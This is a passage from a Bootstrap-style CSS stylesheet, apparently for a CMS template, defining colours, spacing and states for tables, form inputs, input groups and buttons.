  border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-of-type(odd) {
  background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover {
  background-color: #f5f5f5;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
  background-color: #f5f5f5;
}
.table-hover > tbody > tr > td.active:hover,
.table-hover > tbody > tr > th.active:hover,
.table-hover > tbody > tr.active:hover > td,
.table-hover > tbody > tr:hover > .active,
.table-hover > tbody > tr.active:hover > th {
  background-color: #e8e8e8;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
  background-color: #dff0d8;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td,
.table-hover > tbody > tr:hover > .success,
.table-hover > tbody > tr.success:hover > th {
  background-color: #d0e9c6;
}
.table > thead > tr > td.info,
.table > tbody > tr > td.info,
.table > tfoot > tr > td.info,
.table > thead > tr > th.info,
.table > tbody > tr > th.info,
.table > tfoot > tr > th.info,
.table > thead > tr.info > td,
.table > tbody > tr.info > td,
.table > tfoot > tr.info > td,
.table > thead > tr.info > th,
.table > tbody > tr.info > th,
.table > tfoot > tr.info > th {
  background-color: #d9edf7;
}
.table-hover > tbody > tr > td.info:hover,
.table-hover > tbody > tr > th.info:hover,
.table-hover > tbody > tr.info:hover > td,
.table-hover > tbody > tr:hover > .info,
.table-hover > tbody > tr.info:hover > th {
  background-color: #c4e3f3;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
  background-color: #fcf8e3;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td,
.table-hover > tbody > tr:hover > .warning,
.table-hover > tbody > tr.warning:hover > th {
  background-color: #faf2cc;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
  background-color: #f2dede;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td,
.table-hover > tbody > tr:hover > .danger,
.table-hover > tbody > tr.danger:hover > th {
  background-color: #ebcccc;
}
.table-responsive {
  min-height: .01%;
  overflow-x: auto;
}
@media screen and (max-width: 767px) {
  .table-responsive {
    width: 100%;
    margin-bottom: 15px;
    overflow-y: hidden;
    -ms-overflow-style: -ms-autohiding-scrollbar;
    border: 1px solid #dddddd;
  }
  .table-responsive > .table {
    margin-bottom: 0;
  }
  .table-responsive > .table > thead > tr > th,
  .table-responsive > .table > tbody > tr > th,
  .table-responsive > .table > tfoot > tr > th,
  .table-responsive > .table > thead > tr > td,
  .table-responsive > .table > tbody > tr > td,
  .table-responsive > .table > tfoot > tr > td {
    white-space: nowrap;
  }
  .table-responsive > .table-bordered {
    border: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:first-child,
  .table-responsive > .table-bordered > tbody > tr > th:first-child,
  .table-responsive > .table-bordered > tfoot > tr > th:first-child,
  .table-responsive > .table-bordered > thead > tr > td:first-child,
  .table-responsive > .table-bordered > tbody > tr > td:first-child,
  .table-responsive > .table-bordered > tfoot > tr > td:first-child {
    border-left: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:last-child,
  .table-responsive > .table-bordered > tbody > tr > th:last-child,
  .table-responsive > .table-bordered > tfoot > tr > th:last-child,
  .table-responsive > .table-bordered > thead > tr > td:last-child,
  .table-responsive > .table-bordered > tbody > tr > td:last-child,
  .table-responsive > .table-bordered > tfoot > tr > td:last-child {
    border-right: 0;
  }
  .table-responsive > .table-bordered > tbody > tr:last-child > th,
  .table-responsive > .table-bordered > tfoot > tr:last-child > th,
  .table-responsive > .table-bordered > tbody > tr:last-child > td,
  .table-responsive > .table-bordered > tfoot > tr:last-child > td {
    border-bottom: 0;
  }
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select::-ms-expand,
textarea::-ms-expand,
input[type="text"]::-ms-expand,
input[type="password"]::-ms-expand,
input[type="datetime"]::-ms-expand,
input[type="datetime-local"]::-ms-expand,
input[type="date"]::-ms-expand,
input[type="month"]::-ms-expand,
input[type="time"]::-ms-expand,
input[type="week"]::-ms-expand,
input[type="number"]::-ms-expand,
input[type="email"]::-ms-expand,
input[type="url"]::-ms-expand,
input[type="search"]::-ms-expand,
input[type="tel"]::-ms-expand,
input[type="color"]::-ms-expand,
.inputbox::-ms-expand {
  background-color: transparent;
  border: 0;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  background-color: #eeeeee;
  opacity: 1;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #eeeeee;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
input.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
selectinput.input-sm {
  height: 30px;
  line-height: 30px;
}
textareainput.input-sm,
select[multiple]input.input-sm {
  height: auto;
}
input.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
selectinput.input-lg {
  height: 45px;
  line-height: 45px;
}
textareainput.input-lg,
select[multiple]input.input-lg {
  height: auto;
}
@media (min-width: 768px) {
  .form-inline .inputbox,
  .form-inline select,
  .form-inline textarea,
  .form-inline input {
    display: inline-block;
  }
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group .control-label {
  display: block;
  width: 100%;
}
@media (min-width: 768px) {
  .form-horizontal .control-group .control-label {
    display: inline-block;
    float: left;
    width: 160px;
    padding-top: 5px;
    text-align: right;
  }
}
.form-horizontal .control-group .controls {
  margin-left: 180px;
}
.form-actions {
  padding: 20px;
  margin: 20px 0;
  background-color: #eeeeee;
  border-radius: 0;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions [class*="col-sm-offset-"],
.form-actions [class*="col-md-offset-"] {
  padding-left: 5px !important;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input,
.input-append .dropdown-menu,
.input-prepend .dropdown-menu,
.input-append .popover,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input {
  position: relative;
  margin-bottom: 0;
  *margin-left: 0;
  vertical-align: top;
  border-radius: 0 0 0 0;
}
.input-append input:focus,
.input-prepend input:focus,
.input-append select:focus,
.input-prepend select:focus,
.input-append .uneditable-input:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 34px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-prepend .add-on,
.input-append .btn,
.input-prepend .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .btn-group > .dropdown-toggle {
  vertical-align: top;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-right: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  border-radius: 0 0 0 0;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
  border-radius: 0 0 0 0;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  border-radius: 0 0 0 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-left: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-right: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-left: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .btn-group:first-child {
  margin-left: 0;
}
.btn-large {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
  margin-top: 4px;
}
.btn-small {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
  margin-top: 0;
}
.btn-mini {
  padding: 2px 4px;
  font-size: 12px;
  border-radius: 0;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
  margin-top: -1px;
}

fieldset {
  min-width: 0;
  padding: 0;
  margin: 0;
  border: 0;
}
legend {
  display: block;
  width: 100%;
  padding: 0;
  margin-bottom: 20px;
  font-size: 21px;
  line-height: inherit;
  color: #444444;
  border: 0;
  border-bottom: 1px solid #e5e5e5;
}
label {
  display: inline-block;
  max-width: 100%;
  margin-bottom: 5px;
  font-weight: 700;
}
input[type="search"] {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
  -webkit-appearance: none;
  appearance: none;
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  margin-top: 1px \9;
  line-height: normal;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"].disabled,
input[type="checkbox"].disabled,
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"] {
  cursor: not-allowed;
}
input[type="file"] {
  display: block;
}
input[type="range"] {
  display: block;
  width: 100%;
}
select[multiple],
select[size] {
  height: auto;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
output {
  display: block;
  padding-top: 7px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
}
.form-control {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
.form-control::-ms-expand {
  background-color: transparent;
  border: 0;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  background-color: #eeeeee;
  opacity: 1;
}
.form-control[disabled],
fieldset[disabled] .form-control {
  cursor: not-allowed;
}
textarea.form-control {
  height: auto;
}
@media screen and (-webkit-min-device-pixel-ratio: 0) {
  input[type="date"].form-control,
  input[type="time"].form-control,
  input[type="datetime-local"].form-control,
  input[type="month"].form-control {
    line-height: 34px;
  }
  input[type="date"].input-sm,
  input[type="time"].input-sm,
  input[type="datetime-local"].input-sm,
  input[type="month"].input-sm,
  .input-group-sm input[type="date"],
  .input-group-sm input[type="time"],
  .input-group-sm input[type="datetime-local"],
  .input-group-sm input[type="month"] {
    line-height: 30px;
  }
  input[type="date"].input-lg,
  input[type="time"].input-lg,
  input[type="datetime-local"].input-lg,
  input[type="month"].input-lg,
  .input-group-lg input[type="date"],
  .input-group-lg input[type="time"],
  .input-group-lg input[type="datetime-local"],
  .input-group-lg input[type="month"] {
    line-height: 45px;
  }
}
.form-group {
  margin-bottom: 15px;
}
.radio,
.checkbox {
  position: relative;
  display: block;
  margin-top: 10px;
  margin-bottom: 10px;
}
.radio.disabled label,
.checkbox.disabled label,
fieldset[disabled] .radio label,
fieldset[disabled] .checkbox label {
  cursor: not-allowed;
}
.radio label,
.checkbox label {
  min-height: 20px;
  padding-left: 20px;
  margin-bottom: 0;
  font-weight: 400;
  cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
  position: absolute;
  margin-top: 4px \9;
  margin-left: -20px;
}
.radio + .radio,
.checkbox + .checkbox {
  margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
  position: relative;
  display: inline-block;
  padding-left: 20px;
  margin-bottom: 0;
  font-weight: 400;
  vertical-align: middle;
  cursor: pointer;
}
.radio-inline.disabled,
.checkbox-inline.disabled,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox-inline {
  cursor: not-allowed;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
  margin-top: 0;
  margin-left: 10px;
}
.form-control-static {
  min-height: 34px;
  padding-top: 7px;
  padding-bottom: 7px;
  margin-bottom: 0;
}
.form-control-static.input-lg,
.form-control-static.input-sm {
  padding-right: 0;
  padding-left: 0;
}
.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-sm {
  height: 30px;
  line-height: 30px;
}
textarea.input-sm,
select[multiple].input-sm {
  height: auto;
}
.form-group-sm .form-control {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.form-group-sm select.form-control {
  height: 30px;
  line-height: 30px;
}
.form-group-sm textarea.form-control,
.form-group-sm select[multiple].form-control {
  height: auto;
}
.form-group-sm .form-control-static {
  height: 30px;
  min-height: 32px;
  padding: 6px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-lg {
  height: 45px;
  line-height: 45px;
}
textarea.input-lg,
select[multiple].input-lg {
  height: auto;
}
.form-group-lg .form-control {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.form-group-lg select.form-control {
  height: 45px;
  line-height: 45px;
}
.form-group-lg textarea.form-control,
.form-group-lg select[multiple].form-control {
  height: auto;
}
.form-group-lg .form-control-static {
  height: 45px;
  min-height: 38px;
  padding: 11px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.has-feedback {
  position: relative;
}
.has-feedback .form-control {
  padding-right: 42.5px;
}
.form-control-feedback {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 2;
  display: block;
  width: 34px;
  height: 34px;
  line-height: 34px;
  text-align: center;
  pointer-events: none;
}
.input-lg + .form-control-feedback,
.input-group-lg + .form-control-feedback,
.form-group-lg .form-control + .form-control-feedback {
  width: 45px;
  height: 45px;
  line-height: 45px;
}
.input-sm + .form-control-feedback,
.input-group-sm + .form-control-feedback,
.form-group-sm .form-control + .form-control-feedback {
  width: 30px;
  height: 30px;
  line-height: 30px;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline,
.has-success.radio label,
.has-success.checkbox label,
.has-success.radio-inline label,
.has-success.checkbox-inline label {
  color: #468847;
}
.has-success .form-control {
  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
  color: #468847;
  background-color: #dff0d8;
  border-color: #468847;
}
.has-success .form-control-feedback {
  color: #468847;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline,
.has-warning.radio label,
.has-warning.checkbox label,
.has-warning.radio-inline label,
.has-warning.checkbox-inline label {
  color: #c09853;
}
